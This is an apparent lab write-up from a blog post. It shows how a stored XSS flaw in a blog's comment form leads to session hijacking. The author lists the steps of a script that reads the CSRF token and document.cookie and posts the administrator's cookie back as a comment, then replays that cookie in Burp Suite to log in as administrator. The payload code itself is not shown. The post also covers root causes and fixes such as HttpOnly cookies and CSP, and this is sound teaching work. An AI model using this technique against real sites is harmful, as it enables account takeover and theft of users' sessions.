Post cover image

June 11, 2026

From Alert(1) to Admin: Exploiting Stored XSS for Session Hijacking

Overview

Iamdawoodayub

2 min read

In this lab, I exploited a Stored Cross-Site Scripting (XSS) vulnerability in a blog application's comment functionality. The objective was to leverage the XSS vulnerability to obtain an administrator's session cookie and gain access to the administrator account.

This lab demonstrates how a seemingly simple XSS vulnerability can lead to full account compromise when session cookies are accessible to client-side JavaScript.

None

Vulnerability Identification

While reviewing the blog application, I noticed that users could submit comments through a public comment form.

After inspecting the page source, I observed that submitted comments were rendered directly within the HTML page.

To verify whether user input was properly sanitized, I submitted a basic XSS test payload:

After revisiting the blog post, the JavaScript executed successfully, confirming the presence of a Stored XSS vulnerability.

Initial Analysis

The application's comment form contained several parameters:

  • Comment
  • Name
  • Email
  • Website

Additionally, the page included hidden fields such as:

Since the malicious script executed within the context of the victim's browser, it had access to the page DOM and could read values available to authenticated users.

Most importantly, the session cookie was accessible through:

document.cookie

This indicated that the session cookie was not protected with the HttpOnly flag.

Exploitation Strategy

Instead of sending stolen cookies to an external server, I used the application's own comment functionality as a storage mechanism.

The injected JavaScript performed the following actions:

  1. Waited for the page to load.
  2. Retrieved the CSRF token from the page.
  3. Read the current user's cookie.
  4. Submitted a new comment containing the cookie value.

When an administrator viewed the compromised blog post, the payload executed in their browser and automatically posted their session cookie back into the comment section.

Successful Payload

Capturing the Administrator Session

After the administrator visited the blog post, a new comment appeared containing values similar to:

secret=…

session=…

The presence of the administrator's session cookie confirmed successful execution of the payload.

Session Hijacking

Using Burp Suite, I intercepted a request to my account page:

GET /my-account HTTP/2

Cookie: session=

I replaced my session value with the administrator's session identifier obtained from the comment section.

After forwarding the request, the application responded with:

Your username is: administrator

At this point, I had successfully authenticated as the administrator and completed the lab.

Root Cause

The vulnerability existed due to two security weaknesses:

1. Stored Cross-Site Scripting

User-supplied comment content was rendered without proper sanitization or output encoding.

2. Missing HttpOnly Cookie Protection

The session cookie was accessible via:

document.cookie

allowing JavaScript to read and exfiltrate authentication data.

Impact

Successful exploitation allowed:

  • Execution of arbitrary JavaScript in victim browsers.
  • Theft of authenticated session cookies.
  • Account takeover through session hijacking.
  • Administrator account compromise.

In real-world applications, this could lead to:

  • Unauthorized access to sensitive information.
  • Administrative actions performed by attackers.
  • Privilege escalation.
  • Complete application compromise.

Remediation

Organizations can mitigate this issue by:

Output Encoding

Encode user-controlled data before rendering it in HTML.

Input Validation

Validate and sanitize all user-supplied content.

HttpOnly Cookies

Mark session cookies with:

HttpOnly

to prevent access through JavaScript.

Secure Cookie Configuration

Use:

Secure

SameSite

HttpOnly

for session cookies.

Content Security Policy (CSP)

Implement a strong CSP to reduce the impact of XSS vulnerabilities.

Key Lessons Learned

This lab highlights an important distinction:

Many testers stop after triggering an alert box, but real-world impact comes from demonstrating what an attacker can achieve after gaining JavaScript execution.

In this case, Stored XSS was escalated into full administrator account takeover through session theft and session hijacking.

Understanding the post-exploitation impact of XSS is essential for both penetration testers and security professionals.